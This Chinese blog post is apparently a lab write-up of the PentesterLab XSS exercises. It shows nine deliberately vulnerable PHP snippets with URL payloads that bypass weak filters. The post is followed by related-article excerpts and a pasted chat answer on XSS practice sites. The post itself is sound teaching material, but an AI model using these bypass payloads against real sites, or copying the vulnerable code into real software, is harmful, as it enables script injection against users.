pentesterlab xss漏洞分析

最新推荐文章于 2021-10-01 16:22:27 发布
原创 最新推荐文章于 2021-10-01 16:22:27 发布 · 287 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#javascript #php #xss #pentesterlab #ViewUI

本文深入解析pentesterlab平台上的XSS攻击实验,包括环境搭建、多种XSS攻击类型及其对应防御措施,如利用大小写绕过、嵌套标签绕过、编码绕过等,为读者提供全面的XSS防护策略。
[b][size=x-large]pentesterlab简介[/size][/b]

[url=http://pentesterlab.com/]pentesterlab[/url]官方定义自己是一个简单又十分有效学习渗透测试的演练平台。

[b][size=x-large]pentesterlab环境搭建[/size][/b]
官方提供了一个基于debian6的镜像,官网下载镜像,使用vmware建立一个虚拟机,启动即可。

ps:官方文档建议做一个host绑定,方便后面使用
windows下hosts文件目录:C:\Windows\System32\Drivers\etc\hosts,打开后添加以下一行

192.168.1.100 vulnerable # 具体ip可以在虚拟机中使用ifconfig查看


[size=x-large]xss分析[/size]

[*] 第一个xss非常简单,直接输入即可

// <script>alert(1);</script>
http://vulnerable/xss/example1.php?name=%3Cscript%3Ealert(1)%3C/script%3E

它对应的代码如下

<?php 
	echo $_GET["name"];
?>


[*] 第二个xss过滤了[b]小写的<script>与</script>[/b],可以使用大小写绕过

// <sCript>alert(1);</scrIpt>
http://vulnerable/xss/example2.php?name=%3CsCript%3Ealert(1);%3C/scrIpt%3E

它对应的代码如下

<?php 
	$name = $_GET["name"];
	$name = preg_replace("/<script>/", "", $name);
	$name = preg_replace("/<\/script>/", "", $name);
	echo $name;
?>


[*] 第三个xss过滤了[b]不区分大小写的<script>与</script>[/b],可以使用嵌套的script标签绕过

// <sCr<scriPt>ipt>alert(1)</scr</scRipt>Ipt>
http://vulnerable/xss/example3.php?name=%3CsCr%3CscriPt%3Eipt%3Ealert(1)%3C/scr%3C/scRipt%3EIpt%3E

它对应的代码如下

<?php 
	$name = $_GET["name"];
	$name = preg_replace("/<script>/i", "", $name);
	$name = preg_replace("/<\/script>/i", "", $name);
	echo $name;
?>


[*] 第四个xss判断[b]包含script字符串即报错[/b],可以使用img标签绕过

// <img src='a' onerror='alert(1)' />
http://vulnerable/xss/example4.php?name=%3Cimg%20src='a'%20onerror='alert(1)'%20/%3E

它对应的代码如下

<?php 
	if(preg_match('/script/i', $_GET["name"])) {
		die("error");
	}
?>


[*] 第五个xss判断[b]包含alert字符串即报错[/b],@_@,可以使用编码方式绕过

// <iMg src=N onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,112,111,114,117,105,110,39,41))">
http://vulnerable/xss/example5.php?name=%3CiMg%20src=N%20onerror=%22eval(String.fromCharCode(97,108,101,114,116,40,39,112,111,114,117,105,110,39,41))%22%3E

它对应的代码如下

<?php 
	if(preg_match('/alert/i', $_GET["name"])) {
		die("error");
	}
?>


[*] 第六个xss[b]直接在js环境中输出php变量[/b],可以通过构造js脚本绕过

// ";b=alert(1);eval(b);//
http://vulnerable/xss/example6.php?name=%22;b=alert(1);eval(b);//

它对应的代码如下

<script>
	var $a = "<?php echo $_GET["name"]; ?>";
<script>


[*] 第七个xss[b]在js环境中输出通过html编码的php变量[/b],htmlentities没有过滤单引号,使用单引号绕过

// ';b=alert(1);eval(b);//
http://vulnerable/xss/example7.php?name=';b=alert(1);eval(b);//

它对应的代码如下

<script>
	var $a = "<?php echo htmlentities($_GET["name"]); ?>";
<script>


[*] 第八个xss的[b]post地址使用了当前url[/b],构造当前url地址达到xss目的

// /"method="POST"><script>alert(1)</script>
http://vulnerable/xss/example8.php/%22method=%22POST%22%3E%3Cscript%3Ealert(1)%3C/script%3E

它对应的代码如下

<?php 
	if(isset($_POST["name"])) {
		echo "HELLO ".htmlentities($_POST["name"]);
	}
?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
	Your name:<input type="text" name="name" />
	<input type="submit" name="submit" />


[*] 第九个xss[b]直接在页面输出锚点id[/b],构建一个带xss的锚点即可

// #<script>alert(1)</script>
http://vulnerable/xss/example9.php#<script>alert(1)</script>

它对应的代码如下

<script>
	document.write(location.hash.substring(1));
</script>


原创文章http://tinyhema.iteye.com/blog/2003605,转载请注明。
pentesterlab xss(writeup)
一个安全研究员
04-03 1887
example1 第一题往往都是热身题,没有任何的过滤。通过查看源码发现我们输入的内容时直接输出在html标签之间的,所以直接插入: &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt; 注:这里我自己一直有一个误区,今天偶然看到一篇文章才发现,原来审查元素看到的并不是源代码,之前一直是这样查看源码的,有时候会有一些差异,因为源码是我们直接从服务器取过来的代码...
XSS LABS - Level 7 过关思路
Blue17 の 小窝
08-25 680
通过源码分析出触发 XSS 代码的部分为。进入靶场,查看页面源码,搜索关键字。
Debian 6 vweb for pentester XSS第六关
学习
10-01 177
直接查看源代码 <script> var $a= "<?php echo $_GET["name"]; ?>"; </script> 通过 GET 方式传入的 name 变量,直接输出在了script标签里面 可以尝试闭合前面的双引号",然后直接调用alert方法来弹窗,末尾再使用双引号"闭合后面的双引号。 第七关 啥反应都没有 查看源码 <script> var $a= '<?ph...
web安全之XSS入门到精通
xlsj雪松的博客
05-31 1020
目录 一、原理解释 1.1 什么是xss 1.2 xss类型 1.3 xss危害 二、xss实战 2.1 基础入门 2.2 中级难度 2.3 综合过滤 三、高级利用 3.1 xss平台 3.2 cookie权限维持 3.3 beef 一、原理解释 1.1 什么是xss 恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览该页之时,嵌入其中Web里面的Scri...
反射型XSS漏洞练习与总结
王嘟嘟的博客
09-17 2517
0x00 前言 对自己学习xss所遇到的情况以及练习记录,以及自己的感悟进行一个总结。 目录 0x01 …………….DVWA 0x02 …………….xss-quiz.int21h.jp 0x01 DVWA 1.low https://blog.youkuaiyun.com/qq_36869808/article/details/82726751 2.Medium https://blog...
Angular JS模板注入漏洞分析
热门推荐
Exploit的小站~
05-10 2万+
(一)漏洞分析 0x00背景 周末挖掘漏洞的过程中,发现了一个有意思的XSS,是运用了Angular JS的模板进行注入,从而执行了恶意代码,思路和技术比较新颖。Angular JS是一款比较流行的前端MVC框架,很多前沿的网站都在用。 一般,对于XSS都会进行一定的过滤,比如下面的代码: <html ng-app> <head> <script sr...
Web for Pentesters I
CD的博客
03-28 483
Web for Pentesters
反射型XSS <?php echo $_GET[‘x‘];?> 笔记
hello world
02-15 1695
前言 笔记来自《web前端黑客技术揭秘》 书上内容是: http://www.foo.com/xss/re-flect1.php的代码如下。 <?php echo $_GET['x']; ?> 输入x的值未经任何过滤就直接输出,可以提交: http://www.foo.com/xss/reflect1.php?x=<script>alert(1)</script> 服务端解析时,echo就会完整地输出<script>alert(1)<
XSS挑战
→_→
08-19 791
声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。 [实验目的] 1) 理解XSS的含义 2) 了解XSS的形成原因 3) 通过URL传递参数构造XSS弹框 [实验原理] 1) XSS( Cross Site Scripting)恶意攻击者往Web页面里插入恶意htm代码,当用户浏览该页之时,嵌入其中Web里面的htm代码会被执行,从而达到恶意用户的特殊目的。XSS攻击分成两 类,一类是来自内部的攻击...
linux查看应用xss分配情况,2019-03-17 XSS实验报告
weixin_33632843的博客
05-15 260
实验原理XSS是最常见的计算机安全漏洞,又叫CSS(Cross Site Script) ,即跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。在XSS的攻击方式中,需要欺骗用户自己去点击链接才能触发的XSS称为反射型XSS,也称为非持久型XSS(Non-persistent XSS)。反射型X...
xss妙用,快速测试xss漏洞
椰树ii
05-24 1万+
#介绍# 这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录:http://ha.ckers.org/xss.html 。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the XSS (Cross Site Scripting) Prevention Cheat Shee
XSS漏洞与SQL注入漏洞解决方案
u013755149的博客
08-04 5024
XSS 跨站脚本攻击 SQL注入 过滤器
XSS(跨站脚本攻击)详解 (下)
我不生产数据,只是数据的搬运工
02-03 862
XSS(跨站脚本攻击)详解 (下) Hack9月5日 XSS漏洞的简单攻击测试 反射型XSS: 先放出源代码 //前端 1.html:<html><head lang="en"> <meta charset="UTF-8"> ...
Angular Js XSS漏洞
shy的博客
03-17 4641
编写html文档的时候,为了实现代码模块化,增加复杂页面的代码可读性和可维护性,我们常常会想到将代码分散写入不同的HTML文件 angularJS里面的ng-include指令结合ng-controller能够很方便的实现这个目的 ng-include指令用于包含外部的 HTML 文件。 ng-include可以作为一个属性,或者一个元素使用 AngularJS 我可以直接加载html和...
php双写绕过,PHP preg_系列漏洞小结
weixin_42522575的博客
03-10 2022
最近看 P 神以前写的文章,其中在 3 个参数的回调函数中提到了 preg_replace /e 命令执行,对这块不是很熟悉的我特此写这篇文章总结学习一下。preg_matchint preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]...
angular2中DomSanitizer的5种用法记录
涂涂
01-08 9983
1.Cross-site scripting (跨站脚本) 跨站脚本(Cross-site scripting,通常简称为XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页
PentesterLab渗透演练平台
weixin_33695450的博客
04-02 1439
转载自: https://www.blackh4t.org/archives/1143.html http://www.91ri.org/5958.html web for pentester是国外安全研究者开发的的一款web渗透测试平台(环境) 通过该平台你可以了解到常见的Web漏洞检测技术。 1、什么是WebAp...
xss-game appspot
最新发布
03-15
<think>好的,我现在需要处理用户关于寻找与xss-game相关的应用程序或站点的请求。用户特别提到了“xss-game appspot site:appspot.com”,这提示他们可能在寻找托管在Google App Engine(appspot.com)上的XSS游戏或练习平台。 首先,我应该回顾已有的引用内容,看看是否有相关的资源被提及。引用[2]提到了AwesomeXSSXSSChallengeWiki和一些XSS挑战资源,但没有明确提到appspot.com的网站。引用[3]和[4]涉及XSS实例和payload,但同样没有直接相关的信息。 接下来,我需要思考用户可能需要的资源类型。XSS游戏通常用于教学或练习跨站脚本攻击,帮助用户了解如何发现和利用XSS漏洞。Google App Engine(GAE)常被用来托管这类应用,比如著名的“XSS-Game”就曾经在appspot.com上运行。 不过,根据我的知识库,Google的XSS游戏可能已经下线,但用户可能仍然可以通过其他途径找到类似的平台。例如,可能需要推荐替代的站点,如XSS Challenges或类似OverTheWire的关卡式学习平台。此外,引用中提到的XSSChallengeWiki(引用[2])可能包含相关挑战列表,用户可以参考。 另外,用户可能对实际演练感兴趣,所以需要建议一些活跃的练习站点,即使它们不在appspot.com上。同时,考虑到安全,提醒用户仅在合法授权的环境中进行测试。 最后,生成相关问题时要围绕XSS练习资源、替代平台、学习方法以及合法性问题展开,确保覆盖用户可能的后续疑问。</think>根据您的需求,以下是关于寻找XSS-Game相关资源及站点的解答: ### 一、XSS-Game资源整理 1. **Google XSS-Game(已下线但可存档访问)** - 原官方地址为`xss-game.appspot.com`,是Google推出的XSS漏洞实战练习平台,包含6个渐进式关卡[^2]。 - 可通过网络存档(如Web Archive)尝试访问历史版本,部分第三方镜像站可能仍保留内容。 2. **替代性XSS挑战平台推荐** - **XSS Challenges (http://xss-quiz.int21h.jp/)** 提供多难度等级的XSS漏洞实战题目,需绕过过滤规则注入脚本。 - **PentesterLab XSS Exercises** 包含基于真实场景的XSS练习,覆盖反射型、存储型等漏洞类型。 - **OWASP Juice Shop** 综合型Web安全练习平台,包含XSS在内的多种漏洞挑战。 3. **社区推荐资源** - **XSSChallengeWiki(引用自)** 汇总全球XSS挑战赛题及解法,含部分App Engine项目。 - **OverTheWire(引用自[^1])** 提供类似CTF的渐进式安全挑战,涵盖基础Web漏洞。 --- ### 二、操作建议 1. 使用搜索指令组合: ```bash site:appspot.com intitle:"XSS Game" site:github.com "xss-game" appengine ``` 可发现第三方开发的类似项目或开源代码库。 2. 本地部署方案: - 从GitHub克隆开源XSS游戏项目(如`google/xss-game`) - 使用Docker或本地服务器搭建练习环境,避免依赖外部站点。 --- ### 三、注意事项 - 法律合规性:仅在授权环境测试,避免对未授权站点进行漏洞探测[^1]。 - 技术准备:学习XSS绕过技巧,如编码混淆、DOM型漏洞利用(参考引用[^4]中的payload示例)。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值